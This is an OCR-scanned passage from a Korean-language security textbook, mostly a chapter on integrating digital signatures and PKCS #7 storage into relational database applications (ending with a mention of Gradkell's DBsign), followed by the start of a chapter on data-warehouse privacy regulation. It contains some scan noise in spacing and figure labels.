응용프로그람자료에 대한 변경을 방지한다는것과 자료가 변경되지 않는다는것을 증 
명할수 있다는것 사이에는 중요한 차이 가 있다. 이것은 그럴듯한것 갈지만 사용자가 어 



떻게 자기의 접근조종방법 이 손상되지 않았다는것을 증명하는가. 보안위반이 일어 나지 
않았다는것을 증명하는것보다 보안위반이 일어 났다는것을 증명하는것이 훨씬 더 쉽다. 
기관을 속이려는 시도가 람지된다면 해커는 자기의 목적을 달성할수 없을것이다. 

트랜잭션자료가 수자적으로 서명된다면 응용프로그람은 그에 기초하여 자료가 변경 
되지 않았다는것과 자료접근이 합법적인 사용자에 의하여 진행된다는것을 증명할수 있다. 
그러므로 수자식서명이 속임시도를 방지할수는 없지만 응용에 부당한 트랜잭션을 람지하 
는 능력을 부여 하는 방법 으로 속임시도를 성과적 으로 방지 할수는 있다. 

수자식서명 그자체는 이러한 증명을 위하여 응용프로그람과 함께 보관되여야 하는 
분리된 자료토막이 다. 수자식서명 이 응용프로그람의 자료보관요구와 밀착된다는 사실은 
왜 수자식서명기능이 다른 보안기능보다 응용프로그람과 더 견고하게 통합되여야 하는가 
하는 또 다른 리유로 된다. 

콤퓨터에 의한 업무처리 

그림 31—2는 수자식서명 이 콤퓨터 에 의한 업무처 리 에 어떻 게 리용되 는가를 보여 준 
다. 매 단계 에 서 사용자는 중심자료기 지 에 보관된 자료를 보거 나 수정할수 있 는 응용프 
로그람을 리용하고 있 다. 

응용프로그람에 의하여 창조되거 나 수정 되 는 문서 는 매 번 수자식 으로 서 명 된다. 또 
한 자료는 리용될 때마다 서명이 검증된다. 이것은 사용자가 자료기지에 있는 자료가 진 
짜이며 합법적인 사용자에 의하여 창조되였다는것을 확신할수 있게 한다. 이것은 또한 
보안방책 을 강화하며 사용자가 부주의 로 이 단계 들을 뛰 여 넘 는것 을 방지한다. 응용프로 
그람이 문서가 언제 서명되며 그것이 언제 검증되는가 그리고 이러한 조작들이 실패한 
경 우에 는 무엇 을 해 야 하는가를 알아야 하므로 수자식서명 은 응용프로그람흐름론리 에서 
없어서는 안될 하나의 부분으로 되여야 한다. 



그림 31-2. 전형적 인 콤퓨터에 의한 업무처 리 
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자료기지는 각이하다 


지금까지 이 장에서는 수자식서명이 왜 다른 보안기술과 차이나는가를 설명하였다. 
관계형자료기지응용프로그람은 또한 몇가지 고유한 특징들을 가지고 있다. 그러므로 그 
에 맞는 수자식서명통합방법을 요구한다. 

문서란 무엇인가 

수자식으로 서명된 《트랜잭션》에 대해서는 이미 설명하였다. 문서라는 용어도 종 
종 서 명된 자료를 표현하는데 쓰인다(그림 31-3). 수자식서명대 안은 매 류형 에 따라 문 
서를 다르게 정의한다. 실례로 전자우편보안제품들은 문서를 전자우편과 그것의 부속물 
로 정 의 한다. Word 처 리 문서 또는 계 산표 ( spreadsheet ) 를 수자식 으로 서 명 하는 보안제 품들 
도 있다. 다른 제품들은 임의의 파일류형을 수자식으로 서명한다. 이러한 문서들이 내부 
적으로는 명확히 구별되는 많은 자료요소들을 포함하지만 문서는 최종적으로 련속된 바 
이트렬 로 표현된 다. 


-여 


-여 


-여 


-여 

전자우편 


Word 

처 러 문서 


COBOL 

자료파일 


2 진자료과일 


그림 31-3. 문서의 류형 


관계형자료기지는 이러한 자료를 완전히 다르게 보관한다. 자료기지는 구조화된 자 
료를 보관한다. 그러므로 문서를 구성하는 모든 자료요소들은 먼저 류형정의가 되여 있 
어 야 한다. 자료기지는 표준화라는 개 념을 리용한다. 이것은 방대한 량의 구조화된 자료 
를 보관하고 효과적 으로 검색할수 있게 한다. 문서 에 있는 자료는 표로 기 억된다. 표는 
행과 렬로 구성된다. 렬은 매 자료명(례건대 《제품이름》，《송장번호》，《주문날자》) 
과 자료형(례 컨대 문자，수자，날자)을 정 의한다. 레 코드라고 부르는 표의 행 은 표의 매 
렬 에 대 한 실 제자료값을 포함한다. 

여 기서 《 문서》는 관계형자료기 지 에서 하나이상의 렬과 행 으로 구성 된 하나이상의 
표에 있는 자료로서 정의된다. 즉 문서는 다중자료기지표에서 선택된 하나이상의 렬들과 
행 들로 구성 될 수 있다. 그러 므로 문서 는 대 단히 복잡해 질 수 있다. 자료기 지 는 이 러 한 복 
잡성 을 가지 는 방대한 자료를 효과적 으로 조정할수 있도록 설계된다. 

그림 31 -4 는 사람들이 인차 알수 있는 규격의 문서를 보여 준다. Gradkell Systems 
회사로부터 LLED 를퓨터회사에로의 주문절차는 아주 단순하다. 주문서는 보통 주문번호 
에 의하여 식 별된다. 그림 에서는 주문 #123이 다. 주문서 에는 4개의 항목이 있다. 매 항목 
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수량，설명，가격 
과가 어떻게 자료: 



1림 31—5에 없는 
용되는 자료만을 







에 문서이동에만 리용된다. 만일 서명된다면 서명은 자료가 변경될 때 무효로 될것이다. 
따라서 전체 레코드를 서명하는것보다는 어느 렬들을 서명에 포함시키는가를 선택하는것 
이 중요하다. 

주문 #123에 포함된 자료는 련속되는 바이트렬이 아니 다. 이 자료들은 다른 주문자 
료(례 건대 번호가 #345인 pizza 주문)와 혼합되 여 있 다. 수자식 서 명알고리 듬은 련속된 바이 
트렬에 대하여 적용되므로 자료는 자료기지에서 회수되여 련속적인 문자렬형태로 형식화 
되여야 한다. 또한 이것은 매번 정확히 같은 방법에 의하여 진행되여야 한다. 결과가 같 
지 않으면 서명 이 검 증되지 않을것 이 다. 이것은 수자식서명조작이 자료블로크에 대 하여 
진행 되 기때 문이 다. 암호화가 적 용되는 경우에 자료내용은 의미 를 가지지 않는다. 서명처 
리는 오직 자료를 규정된 비트렬로만 본다. 서명검증처리는 단순히 《이것이 서명된 자 
료인가?》와《그것 이 특정한 사용자에 의하여 서명되 였는가?》라는 질문에 대 답한다. 

자료와 함께 표현되 여 야 하는 정 확도는 어 떤 특정한 문제 를 제 기한다. 자료기 지 는 
수값과 날자값을 특수한 방법으로 보관하며 이러한 값들을 나타내는데 리용되는 가정의 
형식을 가지고 있다. 례컨대 날자값이 《 1999년 5월 10일 오후 11시 30분》형태로 서명 
되 였 지 만《 1999-05-10 23:30:00》형 태 로 검 증되 였 다면 서 명 은 자료가 변 경 되 였 기 때 문에 
검 증되지 않는다. 사실 자료표현만이 변경되 였지만 그 표현이 자료가 서명될 때와 꼭 같 
지 는 않다. 수값자료의 경 우도 마찬가지 이 다. 실수 47502.5 는《 $47,502.50 》로 표현될수 
도 있다. 이것은 수값자료와 날자자료를 표현하기 위하여 자료기지 에서 리용되는 기정형 
식이 자료기지관리자에 의하여 변경될수 있는 경우에 발생하는 문제이다. 이러한 문제들 
은 자료기지 에서 자료가 회 복될 때 정 확히 자료형 식 을 규정 한다면 해 결할수 있다. 

틍합방법: 왜 응용프로그람■합이 큰 문제로 되는가 


보안기능을 응용프로그람에 추가할 때 수자식서명은 다른 보안기술들과 근본적으로 
다르다. 그 리유는 다음과 같다. 

• 응용프로그람은 업무처리의 적당한 시점에서 문서의 서명과 검증을 교대적으로 
적용하여 야 한다. 

• 응용프로그람은 자료가 서 명 된 시 점 에 서 부터 변경 되 였 다는것 이 서 명 검 증에 의 하 
여 밝혀 지 는 경 우 문서 를 거 부하든가 또는 처 리 를 정 지 시 킬 수 있 어 야 한다. 

• 수자식 서 명 그자체 는 응용프로그람에 의하여 보관되 는 추가정 보로서 후에 자료 
의 무결성 과 부인 방지 를 증명할수 있 어 야 한다. 

정 확한 수자식서명처 리를 위하여 요구되는 추가적 인 응용론리와 자료보관요구들은 
수자식서명기능이 보통 완전히 명백한 방법 으로 응용프로그람에 추가될수 없다는것을 의 
미 한다. 
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낮은 준우 I 의 암호화도구를 리용하는 ■함 

공개열쇠암호화와 PKI 는 매 우 복잡하다. 암호화알고리 듬의 기 초에 는 현대 수학이 동 
반되여 있으며 암호화는 절대적으로 정확히 실행되여야 한다. 추상구문표기법 (ASN.1) 과 
같이 자료를 부호화하는데 리용되 는 자료형 식 은 매 우 복잡하며 낮은 준위 의 프로그람작 
성 경 험과 함께 ISO 와 ANSI 표준계 렬에 대 하여서도 깊은 리해를 가지 고 있어 야 한다. 증 
명 서고리 를 구성 하고 확인 하는데 필 요한 론리 를 학습하는것 은 매 우 어 렵 다. 다행 히 이 러 
한 낮은 준위의 처 리를 조종하는 암호화도구들이 존재한다. 

그러나 암호화도구를 리용하자면 많은 지식이 필요하다. 개발자들은 수자식서명과 
검 증에 리용되 는 자료구조와 알고리 듬에 대 하여 완전히 파악하여 야 한다. 대 부분의 암호 
화도구들은 개 발자들이 C 또는 C++ 프로그람작성언어 를 리용하는것 을 전제 로 한다. 지 어 
이러한 도구들을 리용할 때에도 그 내부에서 무엇이 진행되고 있는가를 리해하지 못하면 
보안문제 에 서 재 난적 인 결 과를 초래 할수 있 다. 

보안문제외에도 기관이 응용프로그람보안통합에 이러한 도구들을 리용할 때 제기되 
는 여 러 가지 문계들이 있다. 하나의 문제는 높은 위험성 이다. 기관들에는 대체로 VB, 
Power Builder, Oracle Forms, Cold Fusion, JSP, ASP 와 같은 개 발환경 에 익숙한 응용프로 
그람개 발자들은 많지 만 C 와 C++, PKI 프로그람작성，낮은 준위암호화도구들을 다룰수 있 
는 개 발자들은 적 다. 가령 기 관에 〈〈 체 계 준위》개 발자들이 있다고 하더 라도 개 발자들이 
수자식서명기능을 90%완성한 다음에 기 관을 떠 난다면 그 다음에는 어 떻게 하겠는가. 이 
경 우에 통합과 유지 비 용은 높은 비 용을 요구하지 않는 계3자의 해결책 에 의거하는 비 용 
보다 더 많이 들것 이 다. 

많은 경우에 업무자료기지는 갈은 자료에 대하여 여러개의 《전단》을 가진다. 자료 
는 Web 기 반응용프로그람으로부터 발생하며 VB 로 작성 된 응용프로그람에 의하여 내 부적 
으로 처 리 된다. 흔히 낮은 준위 의 도구들을 리용하는 수자식서 명 통합개 발과제 는 하나의 
응용프로그람 또는 하나의 개 발환경 으로 제 한되 여 개 발된다. 만일 수자식서명체계 가 
Web 대 면부에 서 만 동작한다면 다른 응용프로그람들에 서 는 자료가 변경 되 지 않았다는것 을 
보증할수 없다. 

수자식서명이 내장된 개발환경 

낮은 준위의 암호화도구를 리용하는 다른 방법은 수자식서명이 내장된 도구를 리용 
하여 응용프로그람을 완전히 다시 작성하는것 이 다. 새 로운 체계 에서 이것은 아주 잘 동 
작할수 있다. 실례로 일부 전자문서제품들은 내장된 수자식서명기능을 가지고 있다. 이러 
한 제 품들은 일반종이 문서체 계를 콤퓨터 에 의한 문서 체계 로 바꾸는데 효과적 으로 리 용될 
수 있다. 전자문서 는 종이 문서와 류사하게 모든 처 리를 진행한다. 그러 나 서명목적 을 위 
하여 인쇄되지는 말아야 한다. 많은 프로그람묶음들은 관계 형자료기지와 통합되 여 있다. 
그것 블읔 문서 자료의 보관과 회 수를 위하여 자료기 지 를 리 용한다. 또한 문서 보관을 위 하 
여 자료기지를 리용한다. 그러나 이러한 제품들이 다목적자료기지전단으로 되는것은 아 
니다. 일 부 제 품들은 자기 자체 에 고유한 자료기 지 구조를 요구한다. 다른 제 품들은 기 존의 
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자료기지 구조를 통합하는 능력에서 제한성이 있 다. 이러한 제품들은 또한 전자문서 자체 
에 자료의 복사본을 보관한다. 그러므로 이러한 제품들을 자료기지전단으로 리용하면 추 
가적으로 기억과 처리시간이 요구되며 따라서 성능저하가 일어 난다. 보통 전자문서제품 
들은 자체의 개발환경과 마크로언어를 가지고 있다. 그러므로 수자적으로 서명된 전자문 
서를 완전히 다시 작성하여 기존의 응용프로그람에 맞게 변환할수 있다. 

자료기 지접 근에 전 자문서쏘 프트웨 어 를 리용한다면 전자문서제 품을 리 용하여 수자식 
서명을 진행 하는것 이 좋다. 그것은 수자식서 명 이 전자문서 자체 에 보관되기때 문이 다. 례컨 
대 자료기 지 를 리용하는 VB 응용프로그람을 작성한다면 수자식서 명 은 검 증될수 없다. 지 
어 전자문서제 품이 수자식서명 을 검 증할수 있는 프로그람작성대 면부를 포함한다고 하여 
도 전자문서에 보관된 자료복사본을 리용한 검중은 가능하지만 자료기지에 보관된 복사 
본에 대하여서는 검증이 불가능하다. 이것은 VB 응용프로그람이 전자문서에 보관된 자료 
가 아니라 자료기지에 있는 자료에 기초하여 처리되기때문에 아주 중요한 문제이다. 전 
자문서서명의 검증은 자료기지 에 보관된 자료가 변경된다고 하여도 진행할수 있다. 

그러므로 수자식서명기능을 포함한 개발환경을 관계형자료기지에 적용할 때에는 의 
례히 일부 중요한 제한점들이 존재하게 된다. 이러한 제한은 그러한 개발환경들이 일반 
목적용자료기 지응용개 발도구로 설계 되 지 않은것 과 관련된다. 이 개 발환경 들에서 는 흔히 
자료기 지 를 자료의 1차보관매 체 로 리용하지 않고 선택 적 으로 또는 보조기능으로 제 공한 
다. 이러한 개발환경에서 수자식서명기능은 다른 류형의 응용에도 리용할수 있도록 설계 
되지 않는다. 이러한 류형의 수자식서명도구들은 자료중심이 아니라 개발환경중심이다. 


관계형자료기지에서 수자식서명의 일반방법 


이 미 설명한바와 같이 자료기 지응용프로그람을 보안하는 현재 의 방법 은 자료기 지봉 
사기주위에 가상적인 《장벽》을 설치하는것이다. 이러한 장벽에는 망방화벽，암호화，강 
한 인증과 권한부여，침 입탐지 등이 포함된다. 이것은 망보안을 위한 아주 우수한 기능이 
며 복잡하지만 응용프로그람과는 완전히 독립이다. 그러나 이러한 방법은 자료기지봉사 
기준위에서 동작하며 트랜잭션(또는 문서)준위에서 자료무결성과 부인방지를 검증하는 
기 능은 좀 미 약하다. 수자식서명은 응용보안에서 다음 단계 이 다. 그러 나 수자식서명 기능 
은 일정한 응용프로그람통합을 요구하기 때 문에 각이하다. 이 다음 단계 에 도달하기 위하 
여서는 될수록 적 은 응용프로그람통합을 요구하는 관계형자료기지 에 보관된 자료를 수자 
식 으로 서명하는 응용프로그람과 독립인 체계 가 필요하다. 

자료기지에 수자식서 명들 통합시키는데서 나서는 기초요구 

이 장의 다음 부분들에서는 일 반자료기지서명체 계의 기초설계목적 을 설명한다. 

응용프로그람개발자들에게 PKI 지식이 요구되지 않는다. 응용프로 그람개 발자들은 수자 
식서명전문가가 아니라도 된다. 그들은 수자식서명이 무엇인가 하는것도 리해할 필요가 
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없다. 다만 업무처리과정의 어떤 단계에서 어느 문서에 대하여 어떤 조작이 진행되는가 
하는것만은 알아야 한다. 일반자료기지서명체계가 결정할수 없는 응용측면의 5개의 항목 
들은 다음과 갈다. 

1. 어떤 류형의 조작이 실행되여야 하는가(례컨대 서명 또는 검증). 

2. 어떤 류형의 문서 가 서명 또는 검증되는가(례컨대 주문서，송장，시 간카드，휴가신 
청서， 401 K 참가양식 등). 

3. 어떤 특정문서가 서명 또는 검증되는가(례컨대 주열쇠 (primary key ) 는 그 문서를 
유일하게 식 별 하는 값이 다). 

4. 업무처리의 어느 단계에서 수자식서명 또는 검증이 진행되는가. 

5. 서명 또는 검증에서 오유가 발생하면 어 떻게 하는가. 

이러한 항목들은 응용프로그람개발자들이 알아야 할 문제로서 응용프로그람의 다른 
조작들에서 요구되는 정보들과 류사하다. 실례로 응용개발자는《주문번호 123은 사용자 
가 sumit 단추를 누를 때 서명할 필요가 있다》는것 을 알아야 한다. 물론 실제의 처 리는 
더 복잡하지만 응용프로그람개발자는 표의 어느 렬이 서명되고 서명자료가 어디에 보관 
되는가 하는 구체적인 세부는 알 필요가 없다. 

기존자료기지구조에 대한 수정이 요구되지 않는다 수자식서 명체계가 독립적 응용프로 
그람이 되려면 그 어떤 응용프로그람의 자료기지구조에 직접 의존하지 말아야 한다. 그 
러 나 새로운 표를 추가하는것은 문제로 되지 말아야 한다. 

서명되는 자료는 지적■수 있다 자료기지가 자료를 련속적인 바이트렬로 보관하지 
않기때문에 문서 또는 트랜잭션을 포함하는 자료항목들은 자료기지로부터 수집되여 야 한 
다. 서명된 자료는 그것이 검증될 때 서명되였을때와 꼭 갈아야 한다. 이러한 체계는 간 
단히 통합시킬수 있으며 응용프로그람개발자들에게 있어서 이러한 과제는 단순하다. 그 
리고 수자식서명 이 자료수집단계를 실행 하기때문에 자료(표 또는 렬)는 지적될수 있어 야 
한다. 이러한 지적사항에는 매 자료항목들이 어떻게 형식화되는가(례컨대 《오후 1:00》 
또는《13:00》)를 정 의하는 정 보가 있 어 야 한다. 또한 문서 의 주열 쇠 와 기 존표들을 서 로 
련관시키 는 합성방법 이 있 어 야 한다. 

규모조절할수 있고 단일고장점이 없다 자료기 지봉사기 와 응용프로그람봉사기 는 모두 
응용프로그람을 위하여 요구된다. PKI 는 등록부봉사기를 추가한다. 수자식서명체 계는 봉 
사기들에서 병목현상 또는 응용프로그람처리정지를 일으키지 말아야 한다. 

추가적인 서명보관고는 될수록 작아야 한다 자료기 지환경 은 자료의 효과적 인 보관을 
제공할 때에만 우점을 발휘할수 있다. 수자식서명보관의 사실상의 표준은 암호화통보문 
구문표준인 PKCS #7이다. 이 표준은 서명된 문서와 같은 암호화통보문의 자료구조를 정 
의 한다. 

대 부분의 마당들은 선택 적 이 지 만 표준서 명 자료통보문에 는 서 명 자의 인증서，《 사 
슬》구조로 된 다른 CA 인증서，서명된 자료의 복사본이 포함된다. 자료통보문을 서명한 
PKCS #7은《 비표준화》된 큰 2진자료토막이 다. 자료기 지 는 서 명 자와 검 증자가 공유하 
는 중심자료보관고이므로 인증서와 자료를 서 명된 매 문서 에 보관할 필요는 없다. 이 자 
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료는 자료기지에 보관되여 있기때문에 〈〈표준화》될수 있다. 인증서는 오직 한번만 보관 
되 고 자료기 지관계 를 통하여 서 명된 문서들과 련결된다. 하나의 인증서 는 대 략 600- 
l ，000 byte 이 다. PKCS #7통보문은 보통 3개정도의 인증서를 포함한다. 불확정길이를 가진 
자료토막은 또한 PKCS #7통보문에서 제거될수 있다. 왜냐하면 자료는 이미 자료기지에 
보관되여 있으므로 다시 보관할 필요가 없기때문이다. 그림 31—6에서 보여 준바와 같이 
서 명정 보의 표준화는 수자식서명체계 에 요구되는 추가적 인 서명기 억자료량을 크게 감소 
시켰 다. 


보브의 
서명 인증서 

CA 인 층 f 
발행 

年리 

C 의 인증서 

인증서목록 J 


0100101011010100101010110101010011 

1010100101010110101010101010101010 

1010101010101010101010101010100101 

_자료의 복사본_ 


I 보，의하여 서명 1 1 (암원 AVSo 

수자식서명정보 


그림 31-6. PKCS #7 의 서명된 자료통보문은 자료기지보관을 위하여 최적화된다 . 


보브에 의하여 서명 


1 I —— 원래의 서명 
J I (암호、늘 하쉬) 


수자식서명 정보 


최 적 화된 PKCS #7은 대 략 300 byte 이 다. 자료길 이 를 l ，024 byte 로 가정 할 때 최 적 화하 
지 않은 PKCS #7은 3, OOObyte 이상이다. 매 문서에 필요한 자료를 줄임으로써 체계성능을 
개선할수 있다. 왜냐하면 망접속을 통한 자료전송량이 줄어 들기때문이다. 

수자식서명처리의 추상화 



그림 31-7. 자료기 지《 문서》를 서 명 하는 공정 은 
표준화되 여 응용프로그람론리 로부터 갈타진 다 
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수자식서명통합은 수자식서명기능을 기존의 응용프로그람에 《접착》시킨것으로 볼 
수 있 다. 실제의 암호화조작과 PKI 요소와의 호상작용은 낮은 준위 의 암호화도구에 의하 
여 수행된다. 여기서 《 접착제》는 자료기지와 암호화도구가 어떻게 호상작용하는가를 
지 적하는 프로그람서고이다. 

그림 31—7에서 암호화도구는 원래의 자료에 대 한 서명처 리를 진행한다. 자료기지 에 
서 자료의 수집과 서명정 보의 자료기지보관은 자료기지서명 론리 에서 진행된다. 자료기지 
서명 론리 는 자료기지 에서 주문요구자료의 회 수，자료서명 을 위한 암호화도구의 리 용을 
조종한다. 또한 관계형자료기지환경에 최적인 보관형식으로 서명자료를 형식화한다. 

자료기지에서 수자식서명자료처리는 응용프로그람에 맞게 표준화되고 추상화된다. 
그리하여 응용프로그람개 발자들은 수자식서명 에 대 한 구체 적 인 내 용파악이 없 이 관련프 
로그람을 개 발할수 있다. 수자식서명과 관련한 처 리들은 체 계 또는 도구에 의하여 자동 
적으로 조종된다. 


요 약 


이 장에서 는 수자식서명 과 관계 형자료기 지 에서 특징 적 인 일부 문제 들을 설명하였 다. 
수자식서명은 서명검증을 위하여 보관되는 여 러 가지 자료형 식이 므로 각이한 방식 으로 진 
행된다. 관계형자료기지는 또한 특수한 방식 으로 자료를 보관하기때 문에 각이한 형 태로 
존재한다. 이 두 차이 점들이 호상 합쳐 지 면 수자식서명 을 관계형자료기 지 에 결 합시키 는 
것 이 복잡하고 지 루한 작업 으로 되 게 된다. 이 중요한 통합단계의 비 용과 위험 은 많은 
응용에서 수자식서 명의 리용을 방해하였 다. 지 금까지 자료기지환경 을 위하여 특별히 설 
계된 수자식서명제품은 없었다. Gradkell Systems 회사의 DBsign 과 같은 제품들은 수자식 
서명보안을 관계형자료기지응용에 아주 단순하게 통합시킬수 있게 하고 있다. 이러한 제 
품들은 특별히 양성된 제3의 개발자들의 암호화 및 보안관련전문지식에 영향을 주어 복 
잡한 고도기술을 요구하는 통합개발과제를 기관안에서 처리할 때 제기되는 비용과 위험 
을 훨씬 줄 인다. DBsign 또는 Gradkell Systems 에 대한 더 자세 한 정보는 Web 싸이 트 
www . gradkell . com 에 서 얻 을수 있 다. 
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제 3 2 장. 자료보관고의 보안과 사적비밀 


데이비드 본월 
카렌 깁스 
애드리언 웰드휘슨 

어떻게 개인정보가 상업기관들에 의하여 수집되고 리용되며 분배되는가 하는데 대하 
여 공동의 관심이 늘어 나고 있고 끊임없이 변하는 오늘의 환경에서 회사들은 소비자들 
과 관련한 보안과 사적비밀문제를 어떻게 다룰것인가. 소비자들은 자기의 개인정보가 어 
떻게 리용되는가를 정의하고 결심하는데 습관되여 가기때문에 그들은 모든 형태의 거래 
에 대하여 자기들의 정보가 사적비밀로 보존되기를 기대할것이다. 

사적비밀침해와 관련하여 자료파괴와 개인정보의 해득과 그로부터 오는 실제위협들 
은 점점 증가하고 있다. 최근의 사건들은 공개적인 대리인들이 보관고자료기지에 대한 자 
료채 취 (data mining ) 기 술을 리 용하는 기 관들에 의 한 개 인정 보침 해 를 방지 할것 을 얼 마나 요 
구하고 있는가를 실증해 주고 있다. 유럽동맹 은 이 미 사적비밀정 보를 보호하는 법 적문건 
을 통과시 켰다. 류사한 법 적문건과 사적비밀정 보의 보호를 조정 하는 기 관들이 오스트랄리 
아，카나다，뉴질 랜드，체 스꼬공화국을 비 롯한 여 러 나라들에 존재하며 많은 나라들이 이 
에 관심을 돌리기 시작하였다. 정부는 련방통신위원회 ( FTC ) 와 련방상업위원회 ( FTC ) 그리 
고 다른 조정기구들을 발동하여 모든 회사들이 자발적으로 이에 추종하도록 하고 있다. 

사적 비 밀 에 대 한 우려 를 다루는 한가지 전략은 사적비 밀정 보를 매 우 존중하는 건 
전한 관례와 공정을 개발하고 실행시키는것이다. 그러자면 기업에 필요한 정보수집과 
리용을 끊임 없 이 진 행 하면서 도 규제 사항을 준수할수 있는 도구들과 하부구조를 가져 
야 한다. 

이 장에서는 먼저 사적비밀법과 규정，조절과 관련한 기업문제를 설명한다. 현실 
적 인 기 업 씨 나리오는 소비 자별 관점，민족별관점，부문별관점，업 계별관점 으로부터 전 
형 적 인 사적 비밀관련 업 무요구사항들을 제 기한다. 각이한 관점 들은 체 계구조와 기 술선 
택 에 영 향을 미 친다. 이 장에 서 는 다음으로 각이한 구조적기 능의 관점 을 통하여 기 술 
적 문제들을 설명한다 . 장의 요약에서는 보안과 사적비밀요구사항을 자료보관고안에서 
그리고 그것을 통하여 기업과 기술구조체계를 어떻게 밀착시키겠는가에 대하여 언급 
한다. 


사적비밀담보를 우 I 한 문제 


자료보관고문제는 많은 회 사들이 반드시 고려하여 야 할 필수적 인 전략이 다. 오늘날 
개 인 자료를 보호하는 적 당한 규칙 이 존재하지 않는다면 앞으로 개 발되 는 기 술들은 자료 
침해와 같은 도전에 부닥칠것 이 다. 특히 자료보관고의 보안과 사적 비밀을 무시하면 이 러 
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한 도전들에 의하여 기관의 자료보관고전략이 침해 당할수 있다. 

더우기 여러가지 조절활동이 세계적범위에서 진행되고 있다. 유럽동맹지시 
95/46/ EC 와 97/66/ EC 가 지 금 효력 을 나타내 고 있으며 유럽 동맹안에 서 도 사적 비밀과 
관련한 법적문건을 요구하고 있다. 원격통신법령 222분과의 련방통신위원회 ( FCC ) 해설 
서 는 소비 자소유망정 보 ( CPNI ) 의 리 용을 인정 하는 원격 통신회 사들에 대 한 법 적 요구서 
를 채 택하였 다. 나라들사이 에 서 시 민，기 업 주，소비 자들의 국경횡 단이동이 또한 중요 
한 사적 비밀 문제 이 다. 

회 사들은 련 방무역 위 원회 ( FTC )， 련방통신위 원회 ( FCC ), EU 지 시，조절안，제 출안，다른 
림시법 안들에 순응할수 있는 능력을 가짐 으로써 사적비밀보호에서 주도자로서의 지위를 
차지하는데 필 요한 대 책 들을 취 하여 야 할것 이 다. 

사적비 밀 보호기 능은 기 관들에 서 다음의 문제 들을 해 결 하는데 도움이 될 것 이 다. 

• 어 느 자료가 자료보관고에 서 개 인적 으로 식 별될수 있는가를 결정한다. 

• 개 인적 인 자료들을 식 별 하고 수정 한다. 

• 소비 자들이 동의하는 선택 (고르기 와 제 거)을 고려한 자료채 취 기술을 리용한다. 

사적비밀: 기업추동력에 대한 기회와 위협 

회 사들은 성 공을 달성 하기 위하여 대 부분의 업 계 들에 서 공통인 의 견제 출을 통하여 
기 본기 업 운영 을 관리한다. 기 업 운영 과 관련된 두가지 문제 는 소비 자획 득과 소비 자보유이 
다. 이러한 문제들은 흔히 소비자의 요구를 성실히 만족시켜 주며 소비자봉사를 개선하 
는 방법 으로 이 루어 진다. 기 업 운영 의 다른 하나의 문제 는 돈주머 니 공유이다. 이 문제 는 
소비 자의 시 장부문공유를 늘이 기 위한 노력 을 통하여 달성 된 다. 다음의 문제 는 소유총비 
용 ( TCO : total cost of ownership — 의 뢰 기 인 개 인형 콤퓨터 나 봉사기 등의 비 용뿐만아니 라 
판본갱 신，유지 보수，사용자양성 등과 같이 도입후에 드는 여 러 가지 비 용을 포함한 콤퓨 
터체 계의 총비용-역주)으로서 업 무과정 에 지 출을 삭감하거 나 효과성 을 개선하는 과정 을 
통하여 실현된다. 

표 32 — 1에는 사적비밀과 련관된 모든 업계들에서 기업운영에 영향을 줄수 있는 가 
능한 기 회 들과 잠재 적 인 위 협 들의 일 부를 제 시 하였 다. 

소비 자의 사적비 밀 보장은 많은 회 사들의 기 업 상 측면 에 서 그리 고 기 술적 인 측면 에 
서 일 련의 문제 들을 제 기한다. 기 업문제 에 대 한 1차적 인 관심 은 기 술과 개 발결정 에 앞 
서 핵심 기 업문제를 명백 히 해명할수 있게 한다. 그러 나 구체적 인 고찰을 위하여 사적 
비밀문제를 여러개의 구성부분으로 분해하는것이 좋다. 사적비밀문제를 기업과 기술적 
론의 로 갈라 놓으면 이 두 분야의 관건적문제 들에 주의 를 집 중할수 있고 문제 의 분석 
에 서 잘못된 가정 들과 고려하지 못한 문제 점 들을 찾 아 낼 수 있 다. 사적 비밀 문제 의 기 
업관점과 기술적관점을 분석하기에 앞서 먼저 사적비밀보안과 비밀성으로 서로 구분할 
필 요가 있 다. 또한 사적 비 밀방책 을 안내하는 규칙 들이 서 로 다른 기 관들에 의하여 제 
정되였다는것도 정확히 리해하여야 한다. 다음 부분에서 이에 대한 해명을 요점적으로 
설 명 한다. 
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표 32-1 


기업추동력에 대한 기회와 우 I 협 


기 회 


위 협 


개 인정 보의 
리 용 


합리적인 리용을 통하여 사회의 신뢰를 오용에 대한 사회의 우려 즉 악용에 의 
높인다. 하여 초래되는 개별적인 사람들에 대한 

비용부담가능성 


법과 규정 


소비자의 법규정준수에 대한 가능성욱_ 
회사의 영상을 개선하고 소송관련비용을 
제거하는 경쟁무기로서 쓸모 있다. 즉 
핵심기업에 투자를 집중할수 있게 한다 


기업에 대한 벌금，소송，업무에서의 무 
•능:은 운영의 변화나 새로운 하드웨어 
및 쏘프트웨어의 구입으로 하여 주권소 
유자의 가치저락를 초래한다. 즉 핵심기 
업에 투자를 집중할수 없게 한다. 


경제적효과 자료보관고투자는 쓸모 없거나 가치가 위래로운 자료보관고투자는 수집된 정 
적은 자료를 제거함으로써 수집된 자료 보의 가치를 떨어 뜨리고 정보제거와 
의 가치를 증대시키고 시장거래비용을 관련한 비용을 증가시킨다. 

즐이며 소비자수요를 충족시킨다. 즉 정 
보수집의 가치를 증가시킨다. 


용어 해명 

사적비밀문제에서 기업과 기술적관점을 리해하기 위하여서는 용어 《사적비밀》 
( privacy ) 과《 보안》 ( security ), 《 비 밀성》 ( confidentiality ) 의 의 미 를 리 해 하는것 이 중요하다. 

사적비밀은 비법침입의 영향을 받지 않는 개인특권으로 정의된다. 이러한 정의는 많 
은 나라들에 서 효과적 으로 리용되 고 있 으며 많은 자료들에 적 용되 고 있 다. 

보안은 정 보체 계 의 속성 으로서 특정한 방책 상 절 차，정 보의 비 밀 성 과 무결성 을 보호 
하기 위한 담보，중요한 봉사의 러용성，간접 적 으로 사적 비밀을 포괄한다. 

비밀성은 정보의 속성을 정의한다. 비밀정보는 기밀정보 또는 민감한 정보，비법로출 
되 면 해 롭거 나 편견적 인 정 보들이 다. 보안은 개 인정 보의 사적 비 밀과 비밀성담보를 위하 
여 요구되기때문에 소비자의 사적비밀을 가능하게 하는 해결책으로 되자면 업무과정을 
통하여 제출되여 야 한다. 

그림 32 _1은 보안체 계내 부의 론리흐름을 보여 준다. 이 그림 은 공통기 준의 사적 비 
밀콜라스를 규정한 공통기 준 ISO 15408표준에 기 초한것 이 다. 모든 보안서 술과 요구들은 
일 반보안내 용에 기 초하여 제 출한것 이 다. 이 내 용은《 보안은 위 협 으로부터 의 자산보호와 
관련된 문제이며 여기서 위협은 보호된 자산을 악용하려는 모든 가능성을 념두에 둔다》 
라는것을 서술하고 있다. 위협 을 방지 하기 위 하여서 는 모든 위 협을 고려하여 야 한다. 그 
